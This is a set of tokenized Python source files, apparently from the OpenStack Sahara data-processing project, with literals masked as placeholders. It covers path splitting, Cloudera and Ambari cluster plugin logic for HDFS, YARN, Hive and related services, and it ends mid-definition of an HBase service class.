<s> """<STR_LIT>""" <EOL> def split_path ( path , minsegs = <NUM_LIT:1> , maxsegs = None , rest_with_last = False ) : <EOL> """<STR_LIT>""" <EOL> if not maxsegs : <EOL> maxsegs = minsegs <EOL> if minsegs > maxsegs : <EOL> raise ValueError ( '<STR_LIT>' % ( minsegs , maxsegs ) ) <EOL> if rest_with_last : <EOL> segs = path . split ( '<STR_LIT:/>' , maxsegs ) <EOL> minsegs += <NUM_LIT:1> <EOL> maxsegs += <NUM_LIT:1> <EOL> count = len ( segs ) <EOL> if ( segs [ <NUM_LIT:0> ] or count < minsegs or count > maxsegs or <EOL> '<STR_LIT>' in segs [ <NUM_LIT:1> : minsegs ] ) : <EOL> return None , None , None <EOL> else : <EOL> minsegs += <NUM_LIT:1> <EOL> maxsegs += <NUM_LIT:1> <EOL> segs = path . split ( '<STR_LIT:/>' , maxsegs ) <EOL> count = len ( segs ) <EOL> if ( segs [ <NUM_LIT:0> ] or count < minsegs or count > maxsegs + <NUM_LIT:1> or <EOL> '<STR_LIT>' in segs [ <NUM_LIT:1> : minsegs ] or <EOL> ( count == maxsegs + <NUM_LIT:1> and segs [ maxsegs ] ) ) : <EOL> raise ValueError ( '<STR_LIT>' % path ) <EOL> segs = segs [ <NUM_LIT:1> : maxsegs ] <EOL> segs . extend ( [ None ] * ( maxsegs - <NUM_LIT:1> - len ( segs ) ) ) <EOL> return segs </s>
<s> from sahara . service . edp . oozie . workflow_creator import workflow_factory <EOL> from sahara . utils import xmlutils <EOL> def get_possible_hive_config_from ( file_name ) : <EOL> '''<STR_LIT>''' <EOL> config = { <EOL> '<STR_LIT>' : xmlutils . load_hadoop_xml_defaults ( file_name ) , <EOL> '<STR_LIT>' : { } <EOL> } <EOL> return config <EOL> def get_possible_mapreduce_config_from ( file_name ) : <EOL> '''<STR_LIT>''' <EOL> config = { <EOL> '<STR_LIT>' : get_possible_pig_config_from ( file_name ) . get ( '<STR_LIT>' ) <EOL> } <EOL> config [ '<STR_LIT>' ] += workflow_factory . get_possible_mapreduce_configs ( ) <EOL> return config <EOL> def get_possible_pig_config_from ( file_name ) : <EOL> '''<STR_LIT>''' <EOL> config = { <EOL> '<STR_LIT>' : xmlutils . load_hadoop_xml_defaults ( file_name ) , <EOL> '<STR_LIT:args>' : [ ] , <EOL> '<STR_LIT>' : { } <EOL> } <EOL> return config </s>
<s> from sahara . i18n import _ <EOL> from sahara . plugins . cdh import commands as cmd <EOL> from sahara . plugins . cdh . v5_4_0 import cloudera_utils as cu <EOL> from sahara . plugins import utils as gu <EOL> from sahara . service . edp import hdfs_helper as h <EOL> from sahara . utils import cluster_progress_ops as cpo <EOL> PACKAGES = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] <EOL> CU = cu . ClouderaUtilsV540 ( ) <EOL> def configure_cluster ( cluster ) : <EOL> instances = gu . get_instances ( cluster ) <EOL> if not cmd . is_pre_installed_cdh ( CU . pu . get_manager ( cluster ) . remote ( ) ) : <EOL> CU . pu . configure_os ( instances ) <EOL> CU . pu . install_packages ( instances , PACKAGES ) <EOL> CU . pu . start_cloudera_agents ( instances ) <EOL> CU . pu . start_cloudera_manager ( cluster ) <EOL> CU . update_cloudera_password ( cluster ) <EOL> CU . await_agents ( cluster , instances ) <EOL> CU . create_mgmt_service ( cluster ) <EOL> CU . create_services ( cluster ) <EOL> CU . configure_services ( cluster ) <EOL> CU . configure_instances ( instances , cluster ) <EOL> CU . deploy_configs ( cluster ) <EOL> @ cpo . event_wrapper ( <EOL> True , step = _ ( "<STR_LIT>" ) , param = ( '<STR_LIT>' , <NUM_LIT:0> ) ) <EOL> def _start_roles ( cluster , instances ) : <EOL> for instance in instances : <EOL> if '<STR_LIT>' in instance . node_group . node_processes : <EOL> hdfs = CU . get_service_by_role ( '<STR_LIT>' , instance = instance ) <EOL> CU . start_roles ( hdfs , CU . pu . get_role_name ( instance , '<STR_LIT>' ) ) <EOL> if '<STR_LIT>' in instance . node_group . node_processes : <EOL> yarn = CU . get_service_by_role ( '<STR_LIT>' , instance = instance ) <EOL> CU . start_roles ( yarn , CU . pu . get_role_name ( instance , '<STR_LIT>' ) ) <EOL> def scale_cluster ( cluster , instances ) : <EOL> if not instances : <EOL> return <EOL> if not cmd . is_pre_installed_cdh ( instances [ <NUM_LIT:0> ] . remote ( ) ) : <EOL> CU . pu . configure_os ( instances ) <EOL> CU . pu . install_packages ( instances , PACKAGES ) <EOL> CU . pu . start_cloudera_agents ( instances ) <EOL> CU . await_agents ( cluster , instances ) <EOL> CU . configure_instances ( instances , cluster ) <EOL> CU . update_configs ( instances ) <EOL> CU . pu . configure_swift ( cluster , instances ) <EOL> CU . refresh_datanodes ( cluster ) <EOL> _start_roles ( cluster , instances ) <EOL> def decommission_cluster ( cluster , instances ) : <EOL> dns = [ ] <EOL> nms = [ ] <EOL> for i in instances : <EOL> if '<STR_LIT>' in i . node_group . node_processes : <EOL> dns . append ( CU . pu . get_role_name ( i , '<STR_LIT>' ) ) <EOL> if '<STR_LIT>' in i . node_group . node_processes : <EOL> nms . append ( CU . pu . get_role_name ( i , '<STR_LIT>' ) ) <EOL> if dns : <EOL> CU . decommission_nodes ( cluster , '<STR_LIT>' , dns ) <EOL> if nms : <EOL> CU . decommission_nodes ( cluster , '<STR_LIT>' , nms ) <EOL> CU . delete_instances ( cluster , instances ) <EOL> CU . refresh_datanodes ( cluster ) <EOL> CU . refresh_yarn_nodes ( cluster ) <EOL> @ cpo . event_wrapper ( True , step = _ ( "<STR_LIT>" ) , param = ( '<STR_LIT>' , <NUM_LIT:0> ) ) <EOL> def _prepare_cluster ( cluster ) : <EOL> if CU . pu . get_oozie ( cluster ) : <EOL> CU . pu . install_extjs ( cluster ) <EOL> if CU . pu . get_hive_metastore ( cluster ) : <EOL> CU . pu . configure_hive ( cluster ) <EOL> if CU . pu . get_sentry ( cluster ) : <EOL> CU . pu . configure_sentry ( cluster ) <EOL> @ cpo . event_wrapper ( <EOL> True , step = _ ( "<STR_LIT>" ) , param = ( '<STR_LIT>' , <NUM_LIT:0> ) ) <EOL> def _finish_cluster_starting ( cluster ) : <EOL> if CU . pu . get_hive_metastore ( cluster ) : <EOL> CU . pu . put_hive_hdfs_xml ( cluster ) <EOL> server = CU . pu . get_hbase_master ( cluster ) <EOL> if CU . pu . c_helper . is_hbase_common_lib_enabled ( cluster ) and server : <EOL> with server . remote ( ) as r : <EOL> h . create_hbase_common_lib ( r ) <EOL> if CU . pu . get_flumes ( cluster ) : <EOL> flume = CU . get_service_by_role ( '<STR_LIT>' , cluster ) <EOL> CU . start_service ( flume ) <EOL> def start_cluster ( cluster ) : <EOL> _prepare_cluster ( cluster ) <EOL> CU . first_run ( cluster ) <EOL> CU . pu . configure_swift ( cluster ) <EOL> if len ( CU . pu . get_jns ( cluster ) ) > <NUM_LIT:0> : <EOL> CU . enable_namenode_ha ( cluster ) <EOL> CU . update_role_config ( CU . pu . get_secondarynamenode ( cluster ) , <EOL> '<STR_LIT>' ) <EOL> if CU . pu . get_stdb_rm ( cluster ) : <EOL> CU . enable_resourcemanager_ha ( cluster ) <EOL> CU . update_role_config ( CU . pu . get_stdb_rm ( cluster ) , '<STR_LIT>' ) <EOL> _finish_cluster_starting ( cluster ) <EOL> def get_open_ports ( node_group ) : <EOL> ports = [ <NUM_LIT> ] <EOL> ports_map = { <EOL> '<STR_LIT>' : [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] , <EOL> '<STR_LIT>' : [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] , <EOL> '<STR_LIT>' : [ <NUM_LIT> , <NUM_LIT> ] , <EOL> '<STR_LIT>' : [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] , <EOL> '<STR_LIT>' : [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] , <EOL> '<STR_LIT>' : [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] , <EOL> '<STR_LIT>' : [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] , <EOL> '<STR_LIT>' : [ <NUM_LIT> , <NUM_LIT> ] , <EOL> '<STR_LIT>' : [ <NUM_LIT> ] , <EOL> '<STR_LIT>' : [ <NUM_LIT> ] , <EOL> '<STR_LIT>' : [ <NUM_LIT> ] , <EOL> '<STR_LIT>' : [ <NUM_LIT> , <NUM_LIT> ] , <EOL> '<STR_LIT>' : [ <NUM_LIT> ] , <EOL> '<STR_LIT>' : [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] , <EOL> '<STR_LIT>' : [ <NUM_LIT> ] , <EOL> '<STR_LIT>' : [ <NUM_LIT> ] , <EOL> '<STR_LIT>' : [ <NUM_LIT> ] , <EOL> '<STR_LIT>' : [ <NUM_LIT> ] , <EOL> '<STR_LIT>' : [ <NUM_LIT> , <NUM_LIT> ] , <EOL> '<STR_LIT>' : [ <NUM_LIT> , <NUM_LIT> ] , <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : [ <NUM_LIT> , <NUM_LIT> ] , <EOL> '<STR_LIT>' : [ <NUM_LIT> , <NUM_LIT> ] , <EOL> '<STR_LIT>' : [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] , <EOL> '<STR_LIT>' : [ <NUM_LIT> , <NUM_LIT> ] , <EOL> '<STR_LIT>' : [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] <EOL> } <EOL> for process in node_group . node_processes : <EOL> if process in ports_map : <EOL> ports . extend ( ports_map [ process ] ) <EOL> return ports </s>
<s> import re <EOL> from oslo_config import cfg <EOL> from oslo_log import log as logging <EOL> import six <EOL> from sahara import context <EOL> from sahara import exceptions as e <EOL> from sahara . i18n import _ <EOL> from sahara . i18n import _LI <EOL> from sahara . i18n import _LW <EOL> from sahara . plugins import exceptions as ex <EOL> from sahara . plugins import utils <EOL> from sahara . swift import swift_helper as h <EOL> from sahara . topology import topology_helper as th <EOL> CONF = cfg . CONF <EOL> TOPOLOGY_CONFIG = { <EOL> "<STR_LIT>" : <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" : <EOL> "<STR_LIT>" <EOL> } <EOL> LOG = logging . getLogger ( __name__ ) <EOL> def create_service ( name ) : <EOL> for cls in Service . __subclasses__ ( ) : <EOL> if cls . get_service_id ( ) == name : <EOL> return cls ( ) <EOL> return Service ( name ) <EOL> class Service ( object ) : <EOL> def __init__ ( self , name , ambari_managed = True ) : <EOL> self . name = name <EOL> self . configurations = set ( [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . components = [ ] <EOL> self . users = [ ] <EOL> self . deployed = False <EOL> self . ambari_managed = ambari_managed <EOL> def add_component ( self , component ) : <EOL> self . components . append ( component ) <EOL> def add_user ( self , user ) : <EOL> self . users . append ( user ) <EOL> def validate ( self , cluster_spec , cluster ) : <EOL> pass <EOL> def finalize_configuration ( self , cluster_spec ) : <EOL> pass <EOL> def register_user_input_handlers ( self , ui_handlers ) : <EOL> pass <EOL> def register_service_urls ( self , cluster_spec , url_info , cluster ) : <EOL> return url_info <EOL> def pre_service_start ( self , cluster_spec , ambari_info , started_services ) : <EOL> pass <EOL> def finalize_ng_components ( self , cluster_spec ) : <EOL> pass <EOL> def is_user_template_component ( self , component ) : <EOL> return True <EOL> def is_mandatory ( self ) : <EOL> return False <EOL> def _replace_config_token ( self , cluster_spec , token , value , props ) : <EOL> for config_name , props in six . iteritems ( props ) : <EOL> config = cluster_spec . configurations [ config_name ] <EOL> for prop in props : <EOL> config [ prop ] = config [ prop ] . replace ( token , value ) <EOL> def _update_config_values ( self , configurations , value , props ) : <EOL> for absolute_prop_name in props : <EOL> tokens = absolute_prop_name . split ( '<STR_LIT:/>' ) <EOL> config_name = tokens [ <NUM_LIT:0> ] <EOL> prop_name = tokens [ <NUM_LIT:1> ] <EOL> config = configurations [ config_name ] <EOL> config [ prop_name ] = value <EOL> def _get_common_paths ( self , node_groups ) : <EOL> sets = [ ] <EOL> for node_group in node_groups : <EOL> for instance in node_group . instances : <EOL> sets . append ( set ( instance . sahara_instance . storage_paths ( ) ) ) <EOL> return list ( set . intersection ( * sets ) ) if sets else [ ] <EOL> def _generate_storage_path ( self , storage_paths , path ) : <EOL> return "<STR_LIT:U+002C>" . join ( [ p + path for p in storage_paths ] ) <EOL> def _get_port_from_cluster_spec ( self , cluster_spec , service , prop_name ) : <EOL> address = cluster_spec . configurations [ service ] [ prop_name ] <EOL> return utils . get_port_from_address ( address ) <EOL> class HdfsService ( Service ) : <EOL> def __init__ ( self ) : <EOL> super ( HdfsService , self ) . __init__ ( HdfsService . get_service_id ( ) ) <EOL> self . configurations . add ( '<STR_LIT>' ) <EOL> @ classmethod <EOL> def get_service_id ( cls ) : <EOL> return '<STR_LIT>' <EOL> def validate ( self , cluster_spec , cluster ) : <EOL> nn_count = cluster_spec . get_deployed_node_group_count ( '<STR_LIT>' ) <EOL> jn_count = cluster_spec . get_deployed_node_group_count ( '<STR_LIT>' ) <EOL> zkfc_count = cluster_spec . get_deployed_node_group_count ( '<STR_LIT>' ) <EOL> if cluster_spec . is_hdfs_ha_enabled ( cluster ) : <EOL> if nn_count != <NUM_LIT:2> : <EOL> raise ex . NameNodeHAConfigurationError ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" % nn_count ) <EOL> if not ( jn_count >= <NUM_LIT:3> and ( jn_count % <NUM_LIT:2> == <NUM_LIT:1> ) ) : <EOL> raise ex . NameNodeHAConfigurationError ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" % jn_count ) <EOL> else : <EOL> if nn_count != <NUM_LIT:1> : <EOL> raise ex . InvalidComponentCountException ( '<STR_LIT>' , <NUM_LIT:1> , <EOL> nn_count ) <EOL> if jn_count > <NUM_LIT:0> : <EOL> raise ex . NameNodeHAConfigurationError ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> if zkfc_count > <NUM_LIT:0> : <EOL> raise ex . NameNodeHAConfigurationError ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> def finalize_configuration ( self , cluster_spec ) : <EOL> nn_hosts = cluster_spec . determine_component_hosts ( '<STR_LIT>' ) <EOL> if nn_hosts : <EOL> props = { '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' , <EOL> '<STR_LIT>' ] } <EOL> self . _replace_config_token ( <EOL> cluster_spec , '<STR_LIT>' , nn_hosts . pop ( ) . fqdn ( ) , props ) <EOL> snn_hosts = cluster_spec . determine_component_hosts ( <EOL> '<STR_LIT>' ) <EOL> if snn_hosts : <EOL> props = { '<STR_LIT>' : [ '<STR_LIT>' ] } <EOL> self . _replace_config_token ( <EOL> cluster_spec , '<STR_LIT>' , snn_hosts . pop ( ) . fqdn ( ) , props ) <EOL> core_site_config = cluster_spec . configurations [ '<STR_LIT>' ] <EOL> for prop in self . _get_swift_properties ( ) : <EOL> core_site_config [ prop [ '<STR_LIT:name>' ] ] = prop [ '<STR_LIT:value>' ] <EOL> if CONF . enable_data_locality : <EOL> for prop in th . vm_awareness_core_config ( ) : <EOL> core_site_config [ prop [ '<STR_LIT:name>' ] ] = prop [ '<STR_LIT:value>' ] <EOL> core_site_config . update ( TOPOLOGY_CONFIG ) <EOL> nn_ng = cluster_spec . get_node_groups_containing_component ( <EOL> '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> dn_node_groups = cluster_spec . get_node_groups_containing_component ( <EOL> '<STR_LIT>' ) <EOL> common_paths = [ ] <EOL> if dn_node_groups : <EOL> common_paths = self . _get_common_paths ( dn_node_groups ) <EOL> hdfs_site_config = cluster_spec . configurations [ '<STR_LIT>' ] <EOL> hdfs_site_config [ '<STR_LIT>' ] = ( <EOL> self . _generate_storage_path ( <EOL> self . _get_common_paths ( [ nn_ng ] ) , '<STR_LIT>' ) ) <EOL> if common_paths : <EOL> hdfs_site_config [ '<STR_LIT>' ] = ( <EOL> self . _generate_storage_path ( <EOL> common_paths , '<STR_LIT>' ) ) <EOL> def register_service_urls ( self , cluster_spec , url_info , cluster ) : <EOL> namenode_ip = cluster_spec . determine_component_hosts ( <EOL> '<STR_LIT>' ) . pop ( ) . management_ip <EOL> ui_port = self . _get_port_from_cluster_spec ( cluster_spec , '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> nn_port = self . _get_port_from_cluster_spec ( cluster_spec , '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> url_info [ '<STR_LIT>' ] = { <EOL> '<STR_LIT>' : '<STR_LIT>' % ( namenode_ip , ui_port ) , <EOL> '<STR_LIT>' : '<STR_LIT>' % ( namenode_ip , nn_port ) <EOL> } <EOL> if cluster_spec . is_hdfs_ha_enabled ( cluster ) : <EOL> url_info [ '<STR_LIT>' ] . update ( { <EOL> '<STR_LIT>' : '<STR_LIT>' % cluster . name } ) <EOL> return url_info <EOL> def finalize_ng_components ( self , cluster_spec ) : <EOL> hdfs_ng = cluster_spec . get_node_groups_containing_component ( <EOL> '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> components = hdfs_ng . components <EOL> if not cluster_spec . get_deployed_node_group_count ( '<STR_LIT>' ) : <EOL> zk_service = next ( service for service in cluster_spec . services <EOL> if service . name == '<STR_LIT>' ) <EOL> zk_service . deployed = True <EOL> components . append ( '<STR_LIT>' ) <EOL> def is_mandatory ( self ) : <EOL> return True <EOL> def _get_swift_properties ( self ) : <EOL> return h . get_swift_configs ( ) <EOL> class MapReduce2Service ( Service ) : <EOL> def __init__ ( self ) : <EOL> super ( MapReduce2Service , self ) . __init__ ( <EOL> MapReduce2Service . get_service_id ( ) ) <EOL> self . configurations . add ( '<STR_LIT>' ) <EOL> @ classmethod <EOL> def get_service_id ( cls ) : <EOL> return '<STR_LIT>' <EOL> def validate ( self , cluster_spec , cluster ) : <EOL> count = cluster_spec . get_deployed_node_group_count ( '<STR_LIT>' ) <EOL> if count != <NUM_LIT:1> : <EOL> raise ex . InvalidComponentCountException ( '<STR_LIT>' , <NUM_LIT:1> , count ) <EOL> def finalize_configuration ( self , cluster_spec ) : <EOL> hs_hosts = cluster_spec . determine_component_hosts ( '<STR_LIT>' ) <EOL> if hs_hosts : <EOL> props = { '<STR_LIT>' : [ '<STR_LIT>' , <EOL> '<STR_LIT>' ] } <EOL> self . _replace_config_token ( <EOL> cluster_spec , '<STR_LIT>' , hs_hosts . pop ( ) . fqdn ( ) , props ) <EOL> mapred_site_config = cluster_spec . configurations [ '<STR_LIT>' ] <EOL> if CONF . enable_data_locality : <EOL> for prop in th . vm_awareness_mapred_config ( ) : <EOL> mapred_site_config [ prop [ '<STR_LIT:name>' ] ] = prop [ '<STR_LIT:value>' ] <EOL> def register_service_urls ( self , cluster_spec , url_info , cluster ) : <EOL> historyserver_ip = cluster_spec . determine_component_hosts ( <EOL> '<STR_LIT>' ) . pop ( ) . management_ip <EOL> ui_port = self . _get_port_from_cluster_spec ( <EOL> cluster_spec , '<STR_LIT>' , '<STR_LIT>' ) <EOL> hs_port = self . _get_port_from_cluster_spec ( <EOL> cluster_spec , '<STR_LIT>' , '<STR_LIT>' ) <EOL> url_info [ '<STR_LIT>' ] = { <EOL> '<STR_LIT>' : '<STR_LIT>' % ( historyserver_ip , ui_port ) , <EOL> '<STR_LIT>' : '<STR_LIT>' % ( historyserver_ip , hs_port ) <EOL> } <EOL> return url_info <EOL> def finalize_ng_components ( self , cluster_spec ) : <EOL> mr2_ng = cluster_spec . get_node_groups_containing_component ( <EOL> '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> components = mr2_ng . components <EOL> if '<STR_LIT>' not in components : <EOL> components . append ( '<STR_LIT>' ) <EOL> def is_mandatory ( self ) : <EOL> return True <EOL> class YarnService ( Service ) : <EOL> def __init__ ( self ) : <EOL> super ( YarnService , self ) . __init__ ( <EOL> YarnService . get_service_id ( ) ) <EOL> self . configurations . add ( '<STR_LIT>' ) <EOL> self . configurations . add ( '<STR_LIT>' ) <EOL> @ classmethod <EOL> def get_service_id ( cls ) : <EOL> return '<STR_LIT>' <EOL> def validate ( self , cluster_spec , cluster ) : <EOL> count = cluster_spec . get_deployed_node_group_count ( '<STR_LIT>' ) <EOL> if count != <NUM_LIT:1> : <EOL> raise ex . InvalidComponentCountException ( '<STR_LIT>' , <NUM_LIT:1> , <EOL> count ) <EOL> count = cluster_spec . get_deployed_node_group_count ( '<STR_LIT>' ) <EOL> if not count : <EOL> raise ex . InvalidComponentCountException ( <EOL> '<STR_LIT>' , '<STR_LIT>' , count ) <EOL> def finalize_configuration ( self , cluster_spec ) : <EOL> rm_hosts = cluster_spec . determine_component_hosts ( '<STR_LIT>' ) <EOL> if rm_hosts : <EOL> props = { '<STR_LIT>' : [ '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] } <EOL> self . _replace_config_token ( <EOL> cluster_spec , '<STR_LIT>' , rm_hosts . pop ( ) . fqdn ( ) , props ) <EOL> mapred_site_config = cluster_spec . configurations [ '<STR_LIT>' ] <EOL> if CONF . enable_data_locality : <EOL> for prop in th . vm_awareness_mapred_config ( ) : <EOL> mapred_site_config [ prop [ '<STR_LIT:name>' ] ] = prop [ '<STR_LIT:value>' ] <EOL> yarn_site_config = cluster_spec . configurations [ '<STR_LIT>' ] <EOL> nm_node_groups = cluster_spec . get_node_groups_containing_component ( <EOL> '<STR_LIT>' ) <EOL> if nm_node_groups : <EOL> common_paths = self . _get_common_paths ( nm_node_groups ) <EOL> yarn_site_config [ '<STR_LIT>' ] = ( <EOL> self . _generate_storage_path ( common_paths , <EOL> '<STR_LIT>' ) ) <EOL> def register_service_urls ( self , cluster_spec , url_info , cluster ) : <EOL> resourcemgr_ip = cluster_spec . determine_component_hosts ( <EOL> '<STR_LIT>' ) . pop ( ) . management_ip <EOL> ui_port = self . _get_port_from_cluster_spec ( <EOL> cluster_spec , '<STR_LIT>' , '<STR_LIT>' ) <EOL> rm_port = self . _get_port_from_cluster_spec ( <EOL> cluster_spec , '<STR_LIT>' , '<STR_LIT>' ) <EOL> url_info [ '<STR_LIT>' ] = { <EOL> '<STR_LIT>' : '<STR_LIT>' % ( resourcemgr_ip , ui_port ) , <EOL> '<STR_LIT>' : '<STR_LIT>' % ( resourcemgr_ip , rm_port ) <EOL> } <EOL> return url_info <EOL> def is_mandatory ( self ) : <EOL> return True <EOL> class HiveService ( Service ) : <EOL> def __init__ ( self ) : <EOL> super ( HiveService , self ) . __init__ ( HiveService . get_service_id ( ) ) <EOL> self . configurations . add ( '<STR_LIT>' ) <EOL> @ classmethod <EOL> def get_service_id ( cls ) : <EOL> return '<STR_LIT>' <EOL> def validate ( self , cluster_spec , cluster ) : <EOL> count = cluster_spec . get_deployed_node_group_count ( '<STR_LIT>' ) <EOL> if count != <NUM_LIT:1> : <EOL> raise ex . InvalidComponentCountException ( '<STR_LIT>' , <NUM_LIT:1> , count ) <EOL> def finalize_configuration ( self , cluster_spec ) : <EOL> hive_servers = cluster_spec . determine_component_hosts ( '<STR_LIT>' ) <EOL> if hive_servers : <EOL> props = { '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] } <EOL> self . _replace_config_token ( <EOL> cluster_spec , '<STR_LIT>' , hive_servers . pop ( ) . fqdn ( ) , props ) <EOL> hive_ms = cluster_spec . determine_component_hosts ( '<STR_LIT>' ) <EOL> if hive_ms : <EOL> self . _replace_config_token ( <EOL> cluster_spec , '<STR_LIT>' , hive_ms . pop ( ) . fqdn ( ) , <EOL> { '<STR_LIT>' : [ '<STR_LIT>' ] } ) <EOL> hive_mysql = cluster_spec . determine_component_hosts ( '<STR_LIT>' ) <EOL> if hive_mysql : <EOL> self . _replace_config_token ( <EOL> cluster_spec , '<STR_LIT>' , hive_mysql . pop ( ) . fqdn ( ) , <EOL> { '<STR_LIT>' : [ '<STR_LIT>' ] } ) <EOL> def register_user_input_handlers ( self , ui_handlers ) : <EOL> ui_handlers [ '<STR_LIT>' ] = ( <EOL> self . _handle_user_property_metastore_user ) <EOL> ui_handlers [ '<STR_LIT>' ] = ( <EOL> self . _handle_user_property_metastore_pwd ) <EOL> def _handle_user_property_metastore_user ( self , user_input , configurations ) : <EOL> hive_site_config_map = configurations [ '<STR_LIT>' ] <EOL> hive_site_config_map [ '<STR_LIT>' ] = ( <EOL> user_input . value ) <EOL> def _handle_user_property_metastore_pwd ( self , user_input , configurations ) : <EOL> hive_site_config_map = configurations [ '<STR_LIT>' ] <EOL> hive_site_config_map [ '<STR_LIT>' ] = ( <EOL> user_input . value ) <EOL> def finalize_ng_components ( self , cluster_spec ) : <EOL> hive_ng = cluster_spec . get_node_groups_containing_component ( <EOL> '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> components = hive_ng . components <EOL> if '<STR_LIT>' not in components : <EOL> components . append ( '<STR_LIT>' ) <EOL> if not cluster_spec . get_deployed_node_group_count ( '<STR_LIT>' ) : <EOL> components . append ( '<STR_LIT>' ) <EOL> if not cluster_spec . get_deployed_node_group_count ( '<STR_LIT>' ) : <EOL> components . append ( '<STR_LIT>' ) <EOL> if not cluster_spec . get_deployed_node_group_count ( '<STR_LIT>' ) : <EOL> zk_service = next ( service for service in cluster_spec . services <EOL> if service . name == '<STR_LIT>' ) <EOL> zk_service . deployed = True <EOL> components . append ( '<STR_LIT>' ) <EOL> class WebHCatService ( Service ) : <EOL> def __init__ ( self ) : <EOL> super ( WebHCatService , self ) . __init__ ( WebHCatService . get_service_id ( ) ) <EOL> self . configurations . add ( '<STR_LIT>' ) <EOL> @ classmethod <EOL> def get_service_id ( cls ) : <EOL> return '<STR_LIT>' <EOL> def validate ( self , cluster_spec , cluster ) : <EOL> count = cluster_spec . get_deployed_node_group_count ( '<STR_LIT>' ) <EOL> if count != <NUM_LIT:1> : <EOL> raise ex . InvalidComponentCountException ( '<STR_LIT>' , <NUM_LIT:1> , count ) <EOL> def finalize_configuration ( self , cluster_spec ) : <EOL> webhcat_servers = cluster_spec . determine_component_hosts ( <EOL> '<STR_LIT>' ) <EOL> if webhcat_servers : <EOL> self . _replace_config_token ( <EOL> cluster_spec , '<STR_LIT>' , webhcat_servers . pop ( ) . fqdn ( ) , <EOL> { '<STR_LIT>' : [ '<STR_LIT>' ] } ) <EOL> hive_ms_servers = cluster_spec . determine_component_hosts ( <EOL> '<STR_LIT>' ) <EOL> if hive_ms_servers : <EOL> self . _replace_config_token ( <EOL> cluster_spec , '<STR_LIT>' , <EOL> hive_ms_servers . pop ( ) . fqdn ( ) , <EOL> { '<STR_LIT>' : [ '<STR_LIT>' ] } ) <EOL> zk_servers = cluster_spec . determine_component_hosts ( '<STR_LIT>' ) <EOL> if zk_servers : <EOL> zk_list = [ '<STR_LIT>' . format ( z . fqdn ( ) ) for z in zk_servers ] <EOL> self . _replace_config_token ( <EOL> cluster_spec , '<STR_LIT>' , '<STR_LIT:U+002C>' . join ( zk_list ) , <EOL> { '<STR_LIT>' : [ '<STR_LIT>' ] } ) <EOL> def finalize_ng_components ( self , cluster_spec ) : <EOL> webhcat_ng = cluster_spec . get_node_groups_containing_component ( <EOL> '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> components = webhcat_ng . components <EOL> if '<STR_LIT>' not in components : <EOL> components . append ( '<STR_LIT>' ) <EOL> if '<STR_LIT>' not in components : <EOL> components . append ( '<STR_LIT>' ) <EOL> if '<STR_LIT>' not in components : <EOL> components . append ( '<STR_LIT>' ) <EOL> if '<STR_LIT>' not in components : <EOL> if not cluster_spec . get_deployed_node_group_count ( <EOL> '<STR_LIT>' ) : <EOL> zk_service = next ( service for service in cluster_spec . services <EOL> if service . name == '<STR_LIT>' ) <EOL> zk_service . deployed = True <EOL> components . append ( '<STR_LIT>' ) <EOL> components . append ( '<STR_LIT>' ) <EOL> class HBaseService ( Service ) : <EOL> property_map = { <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' , '<STR_LIT>' ] , 